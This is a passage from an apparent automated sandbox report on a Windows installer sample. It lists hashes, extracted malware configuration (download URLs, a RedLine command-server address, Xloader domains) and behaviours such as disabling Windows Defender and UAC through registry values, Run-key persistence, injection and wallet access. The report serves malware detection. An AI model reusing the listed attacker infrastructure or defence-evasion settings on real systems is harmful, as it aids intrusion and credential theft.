Resubmissions
30-10-2021 19:59
211030-yqs94acafr 1030-10-2021 19:47
211030-yhtkwscafm 1030-10-2021 18:51
211030-xhyzyacabn 1030-10-2021 08:53
211030-ktb84abdfp 10Analysis
-
max time kernel
1492s -
max time network
2695s -
platform
windows11_x64 -
resource
win11 -
submitted
30-10-2021 08:53
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
2c1278bdd864323e17dd46c7774e0d08
-
SHA1
4e03a5d24d1d6ed106320778e9135b88f27ecfbe
-
SHA256
a5e44dd81280a7fbef17c18e528c9df4b1289144fbc107d011af282a69cc3062
-
SHA512
82a1d89e0692e8037563c92c834a3e3181b52c4423d8d6d860d31d56ef2a3c12083f8ddcc0e058ba7119a7c636938be963c70a14bdc276495e1b1b630ceddd25
Malware Config
Extracted
https://fortnightgalaxyswapper.ru/sold.exe
Extracted
https://fortnightgalaxyswapper.ru/Amongus.exe
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7024 4792 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2576 4792 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1432-304-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1432-303-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe52B3.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exedescription pid process target process PID 1400 created 5236 1400 WerFault.exe 3dMI4Si0Juc8JmYItUK1_bOX.exe PID 1084 created 5588 1084 WerFault.exe Vgb9MSUHJnGgHNOrMsbi_BKX.exe PID 6148 created 7096 6148 WerFault.exe cmd.exe PID 5528 created 3160 5528 WerFault.exe Sat01866e4ba0024d.exe PID 6396 created 5240 6396 WerFault.exe soldd.exe PID 5512 created 4692 5512 cmd.exe Sat01e3b3e0fa80800c.exe PID 6268 created 4704 6268 WerFault.exe WerFault.exe PID 2592 created 3336 2592 WerFault.exe Sat0119f3e03c741b02f.exe PID 1888 created 6628 1888 WerFault.exe WerFault.exe PID 6344 created 5924 6344 WerFault.exe qm3T17zb2S0FFFQu0bRAfL_O.exe PID 6788 created 5596 6788 WerFault.exe FOGl6ElFqFbTpkovg9hhVPi3.exe PID 6212 created 4788 6212 52B3.exe FOGl6ElFqFbTpkovg9hhVPi3.exe PID 7240 created 4704 7240 WerFault.exe WerFault.exe PID 7296 created 6408 7296 WerFault.exe rundll32.exe PID 7440 created 5608 7440 WerFault.exe qWZSTdOhU4VG7egnd7FPanGp.exe PID 7524 created 1348 7524 WerFault.exe fx6ZjM_T3TYXA8Vgl8TM4_N8.exe PID 7824 created 4172 7824 WerFault.exe 6ltbOXKT_ifPZ3wV_9gaAgR_.exe PID 4704 created 5424 4704 WerFault.exe Soft1WW01.exe PID 2056 created 1064 2056 WerFault.exe setup.exe PID 5020 created 7724 5020 WerFault.exe dPDD1_x1AYINcoVmULBbF_RG.exe PID 5028 created 7696 5028 WerFault.exe KngXFzzriYmz7oZXLnNJ7Oje.exe PID 1968 created 8024 1968 WerFault.exe 28Fes2YSzGb2vczE9pkmn4AA.exe PID 5820 created 7560 5820 WerFault.exe qMMgF0iy9oz3KXaRZNQHcx4E.exe PID 8116 created 8048 8116 WerFault.exe zYdlxzTOubkxt6qsS_obRu5x.exe PID 2752 created 5996 2752 WerFault.exe 1386.exe PID 6628 created 4740 6628 WerFault.exe powershell.exe PID 1732 created 6272 1732 WerFault.exe 5C69.exe PID 4468 created 7148 4468 WerFault.exe 65A2.exe PID 3632 created 5888 3632 WerFault.exe powershell.exe PID 6664 created 5624 6664 WerFault.exe powershell.exe PID 3740 created 2904 3740 schtasks.exe powershell.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 5852 created 6480 5852 svchost.exe AdvancedRun.exe PID 5852 created 6480 5852 svchost.exe AdvancedRun.exe PID 5852 created 888 5852 svchost.exe AdvancedRun.exe PID 5852 created 888 5852 svchost.exe AdvancedRun.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/6956-591-0x0000000002790000-0x00000000027B9000-memory.dmp xloader -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 8 IoCs
Processes:
mshta.execmd.exepowershell.exepowershell.execmstp.exeflow pid process 56 3088 mshta.exe 60 3088 mshta.exe 231 5208 cmd.exe 465 6148 powershell.exe 474 7284 powershell.exe 572 6956 cmstp.exe 681 6956 cmstp.exe 789 6956 cmstp.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat01b537da2e0af175a.exeSat01866e4ba0024d.exeSat0188dba58af938.exeSat016e74da9cbf1.exeSat01e3b3e0fa80800c.exeSat01c0e0d4fbb2ea73.exeSat01c5002407.exeSat018ad0a25a7faa.exeSat01d42d6cf82db.exeSat01f932a994dbc6.exeSat0119f3e03c741b02f.exeSat01688f54435b6.exeSat01519886887.exeSat018ad0a25a7faa.tmpSat018ad0a25a7faa.exemshta.exeSat01f932a994dbc6.exee5H4avJGAknZvvCppg0GFVNM.exe7604105.exeSat01d42d6cf82db.exee5H4avJGAknZvvCppg0GFVNM.exeLzmwAqmV.exe4877252.exe6925404.exe8633857.exeChrome5.exeDownFlSetup110.exeBBIOHV.eXEpcDa6JJRRSX5ENuJg_ClL7Id.exexialBpZY0CCGO2X6atbO74Tn.exe3dMI4Si0Juc8JmYItUK1_bOX.exeMSMT3yGmzXPkyNGU4Ioc_cX7.exeokMapBnuwoKkFkv6DNJnxaAd.exex_NIOasvKYPQ56cpcMhnsHLe.exeVnbdvi08mAvQMZ57cLQirs_r.exefx6ZjM_T3TYXA8Vgl8TM4_N8.exeHhHYpWjRp4fWvBG9HSpLlEXd.exeo9uSZntIwqe93u3YXgjwODAp.exesoldd.exeo9uSZntIwqe93u3YXgjwODAp.exeFOGl6ElFqFbTpkovg9hhVPi3.exe6ltbOXKT_ifPZ3wV_9gaAgR_.exeqWZSTdOhU4VG7egnd7FPanGp.exeVnbdvi08mAvQMZ57cLQirs_r.exeFOGl6ElFqFbTpkovg9hhVPi3.exet2RSCnrA9J7oKhlzpAzxT6n3.exenYM_HzkzBazNv3s7A45da1FV.exeLF6wUUS4Bh5t4GsH_50X1G6X.exeLF6wUUS4Bh5t4GsH_50X1G6X.exeinst1.exeVgb9MSUHJnGgHNOrMsbi_BKX.exeqm3T17zb2S0FFFQu0bRAfL_O.exeLRSqKfZCaNZ_zXzXGAw7tCbk.exejg1_1faf.executm3.exeRegAsm.exeSoft1WW01.exeWerFault.exemsiexec.exeWerFault.exe5.exeWTkq_9ecc7BH3DTIjhrTRzAW.exepid process 4344 setup_installer.exe 1436 setup_install.exe 5092 Sat01b537da2e0af175a.exe 3160 Sat01866e4ba0024d.exe 4872 Sat0188dba58af938.exe 3788 Sat016e74da9cbf1.exe 4692 Sat01e3b3e0fa80800c.exe 4704 Sat01c0e0d4fbb2ea73.exe 4936 Sat01c5002407.exe 4612 Sat018ad0a25a7faa.exe 3232 Sat01d42d6cf82db.exe 768 Sat01f932a994dbc6.exe 3336 Sat0119f3e03c741b02f.exe 4364 Sat01688f54435b6.exe 4452 Sat01519886887.exe 936 Sat018ad0a25a7faa.tmp 2200 Sat018ad0a25a7faa.exe 3088 mshta.exe 5132 Sat01f932a994dbc6.exe 5228 e5H4avJGAknZvvCppg0GFVNM.exe 5208 7604105.exe 1432 Sat01d42d6cf82db.exe 5260 e5H4avJGAknZvvCppg0GFVNM.exe 5324 LzmwAqmV.exe 5356 4877252.exe 5460 6925404.exe 5652 8633857.exe 5792 Chrome5.exe 6040 DownFlSetup110.exe 6076 BBIOHV.eXE 5316 pcDa6JJRRSX5ENuJg_ClL7Id.exe 3068 xialBpZY0CCGO2X6atbO74Tn.exe 5236 3dMI4Si0Juc8JmYItUK1_bOX.exe 2488 MSMT3yGmzXPkyNGU4Ioc_cX7.exe 3372 okMapBnuwoKkFkv6DNJnxaAd.exe 4132 x_NIOasvKYPQ56cpcMhnsHLe.exe 4384 Vnbdvi08mAvQMZ57cLQirs_r.exe 1348 fx6ZjM_T3TYXA8Vgl8TM4_N8.exe 5392 HhHYpWjRp4fWvBG9HSpLlEXd.exe 5280 o9uSZntIwqe93u3YXgjwODAp.exe 5240 soldd.exe 5640 o9uSZntIwqe93u3YXgjwODAp.exe 5596 FOGl6ElFqFbTpkovg9hhVPi3.exe 4172 6ltbOXKT_ifPZ3wV_9gaAgR_.exe 5608 qWZSTdOhU4VG7egnd7FPanGp.exe 5684 Vnbdvi08mAvQMZ57cLQirs_r.exe 4788 FOGl6ElFqFbTpkovg9hhVPi3.exe 5704 t2RSCnrA9J7oKhlzpAzxT6n3.exe 5700 nYM_HzkzBazNv3s7A45da1FV.exe 5744 LF6wUUS4Bh5t4GsH_50X1G6X.exe 2236 LF6wUUS4Bh5t4GsH_50X1G6X.exe 5480 inst1.exe 5588 Vgb9MSUHJnGgHNOrMsbi_BKX.exe 5924 qm3T17zb2S0FFFQu0bRAfL_O.exe 4820 LRSqKfZCaNZ_zXzXGAw7tCbk.exe 6004 jg1_1faf.exe 4996 cutm3.exe 5812 RegAsm.exe 5424 Soft1WW01.exe 6300 WerFault.exe 6500 msiexec.exe 6628 WerFault.exe 7080 5.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe -
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Vgb9MSUHJnGgHNOrMsbi_BKX.exesoldd.exeLF6wUUS4Bh5t4GsH_50X1G6X.exe52B3.exe3dMI4Si0Juc8JmYItUK1_bOX.exet2RSCnrA9J7oKhlzpAzxT6n3.exeLF6wUUS4Bh5t4GsH_50X1G6X.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Vgb9MSUHJnGgHNOrMsbi_BKX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion soldd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LF6wUUS4Bh5t4GsH_50X1G6X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 52B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LF6wUUS4Bh5t4GsH_50X1G6X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3dMI4Si0Juc8JmYItUK1_bOX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion soldd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion t2RSCnrA9J7oKhlzpAzxT6n3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LF6wUUS4Bh5t4GsH_50X1G6X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 52B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3dMI4Si0Juc8JmYItUK1_bOX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Vgb9MSUHJnGgHNOrMsbi_BKX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion t2RSCnrA9J7oKhlzpAzxT6n3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LF6wUUS4Bh5t4GsH_50X1G6X.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSat018ad0a25a7faa.tmpmshta.execmd.exeWTkq_9ecc7BH3DTIjhrTRzAW.exeCalculator Installation.exerundll32.exejfn8vpxKNthDu5DnWkBIAFRS.exeCalculator.exehbmssEj0o1Sjtg9efIzhu9Cj.tmpEfZylDS8gnimdLu50tagoPKK.tmpmsiexec.exesetup.exerundll32.exesetup.exeCalculator.exemsiexec.execonhost.exeCalculator.exeCalculator.exepid process 1436 setup_install.exe 1436 setup_install.exe 1436 setup_install.exe 1436 setup_install.exe 1436 setup_install.exe 1436 setup_install.exe 936 Sat018ad0a25a7faa.tmp 3088 mshta.exe 7096 cmd.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 5776 Calculator Installation.exe 5776 Calculator Installation.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 5776 Calculator Installation.exe 5776 Calculator Installation.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 5776 Calculator Installation.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6208 WTkq_9ecc7BH3DTIjhrTRzAW.exe 6408 rundll32.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 6316 Calculator.exe 6316 Calculator.exe 6316 Calculator.exe 3508 hbmssEj0o1Sjtg9efIzhu9Cj.tmp 6452 EfZylDS8gnimdLu50tagoPKK.tmp 6500 msiexec.exe 6316 Calculator.exe 6316 Calculator.exe 6316 Calculator.exe 4928 setup.exe 4928 setup.exe 8088 rundll32.exe 8088 rundll32.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 6164 setup.exe 6164 setup.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 7652 jfn8vpxKNthDu5DnWkBIAFRS.exe 7864 Calculator.exe 7864 Calculator.exe 4940 msiexec.exe 4940 msiexec.exe 5220 conhost.exe 5220 conhost.exe 4928 setup.exe 4928 setup.exe 7116 Calculator.exe 4928 setup.exe 4928 setup.exe 5776 Calculator Installation.exe 6164 setup.exe 6164 setup.exe 1500 Calculator.exe 6164 setup.exe 7864 Calculator.exe 7864 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
xialBpZY0CCGO2X6atbO74Tn.exe569C.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths xialBpZY0CCGO2X6atbO74Tn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\569C.exe = "0" 569C.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\xialBpZY0CCGO2X6atbO74Tn.exe = "0" xialBpZY0CCGO2X6atbO74Tn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" xialBpZY0CCGO2X6atbO74Tn.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features xialBpZY0CCGO2X6atbO74Tn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" xialBpZY0CCGO2X6atbO74Tn.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
cmstp.exesetup.exeCalculator.exesetup.exemsedge.exe1775299.exedescription ioc process Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run cmstp.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Calculator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" Calculator.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WDEHFTBP1 = "C:\\Program Files (x86)\\A7nrtit\\helpydn.exe" cmstp.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1775299.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
569C.exesoldd.exeVgb9MSUHJnGgHNOrMsbi_BKX.exet2RSCnrA9J7oKhlzpAzxT6n3.exeLF6wUUS4Bh5t4GsH_50X1G6X.exejg1_1faf.exe3dMI4Si0Juc8JmYItUK1_bOX.exeLF6wUUS4Bh5t4GsH_50X1G6X.exe52B3.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 569C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA soldd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Vgb9MSUHJnGgHNOrMsbi_BKX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA t2RSCnrA9J7oKhlzpAzxT6n3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LF6wUUS4Bh5t4GsH_50X1G6X.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3dMI4Si0Juc8JmYItUK1_bOX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LF6wUUS4Bh5t4GsH_50X1G6X.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 52B3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 569C.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 48 ipinfo.io 162 ipinfo.io 163 ipinfo.io 218 ipinfo.io 227 ipinfo.io 2 ip-api.com 8 ipinfo.io 47 ipinfo.io 192 ipinfo.io -
Drops file in System32 directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\services32.exe conhost.exe File opened for modification C:\Windows\system32\services32.exe conhost.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
LF6wUUS4Bh5t4GsH_50X1G6X.exeLF6wUUS4Bh5t4GsH_50X1G6X.exet2RSCnrA9J7oKhlzpAzxT6n3.exe52B3.exepid process 5744 LF6wUUS4Bh5t4GsH_50X1G6X.exe 2236 LF6wUUS4Bh5t4GsH_50X1G6X.exe 5704 t2RSCnrA9J7oKhlzpAzxT6n3.exe 6212 52B3.exe -
Suspicious use of SetThreadContext 15 IoCs
Processes:
Sat01d42d6cf82db.exeokMapBnuwoKkFkv6DNJnxaAd.exeVgb9MSUHJnGgHNOrMsbi_BKX.exe3dMI4Si0Juc8JmYItUK1_bOX.exesoldd.exeWerFault.exeVnbdvi08mAvQMZ57cLQirs_r.exeLRSqKfZCaNZ_zXzXGAw7tCbk.exexialBpZY0CCGO2X6atbO74Tn.execmstp.execonhost.exeD6C9.exe6B9E.exe569C.exedescription pid process target process PID 3232 set thread context of 1432 3232 Sat01d42d6cf82db.exe Sat01d42d6cf82db.exe PID 3372 set thread context of 3196 3372 okMapBnuwoKkFkv6DNJnxaAd.exe Explorer.EXE PID 5588 set thread context of 6996 5588 Vgb9MSUHJnGgHNOrMsbi_BKX.exe AppLaunch.exe PID 5236 set thread context of 7148 5236 3dMI4Si0Juc8JmYItUK1_bOX.exe 65A2.exe PID 5240 set thread context of 5936 5240 soldd.exe AppLaunch.exe PID 4384 set thread context of 5812 4384 WerFault.exe RegAsm.exe PID 5684 set thread context of 6992 5684 Vnbdvi08mAvQMZ57cLQirs_r.exe RegAsm.exe PID 4820 set thread context of 7024 4820 LRSqKfZCaNZ_zXzXGAw7tCbk.exe LRSqKfZCaNZ_zXzXGAw7tCbk.exe PID 3068 set thread context of 1472 3068 xialBpZY0CCGO2X6atbO74Tn.exe xialBpZY0CCGO2X6atbO74Tn.exe PID 6956 set thread context of 3196 6956 cmstp.exe Explorer.EXE PID 8016 set thread context of 668 8016 conhost.exe explorer.exe PID 6952 set thread context of 5388 6952 D6C9.exe D6C9.exe PID 6956 set thread context of 668 6956 cmstp.exe explorer.exe PID 6836 set thread context of 5352 6836 6B9E.exe 6B9E.exe PID 2852 set thread context of 7124 2852 569C.exe aspnet_state.exe -
Drops file in Program Files directory 15 IoCs
Processes:
mshta.exeo9uSZntIwqe93u3YXgjwODAp.execmstp.exeexplorer.exex_NIOasvKYPQ56cpcMhnsHLe.exeo9uSZntIwqe93u3YXgjwODAp.exedescription ioc process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat mshta.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o9uSZntIwqe93u3YXgjwODAp.exe File opened for modification C:\Program Files (x86)\A7nrtit\helpydn.exe cmstp.exe File opened for modification C:\Program Files (x86)\A7nrtit\helpydn.exe explorer.exe File created C:\Program Files (x86)\FarLabUninstaller\is-A3T6M.tmp mshta.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe x_NIOasvKYPQ56cpcMhnsHLe.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini x_NIOasvKYPQ56cpcMhnsHLe.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o9uSZntIwqe93u3YXgjwODAp.exe File created C:\Program Files (x86)\A7nrtit\helpydn.exe explorer.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat mshta.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe x_NIOasvKYPQ56cpcMhnsHLe.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe x_NIOasvKYPQ56cpcMhnsHLe.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o9uSZntIwqe93u3YXgjwODAp.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe o9uSZntIwqe93u3YXgjwODAp.exe File opened for modification C:\Program Files (x86)\A7nrtit explorer.exe -
Drops file in Windows directory 7 IoCs
Processes:
svchost.exeWerFault.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
Processes:
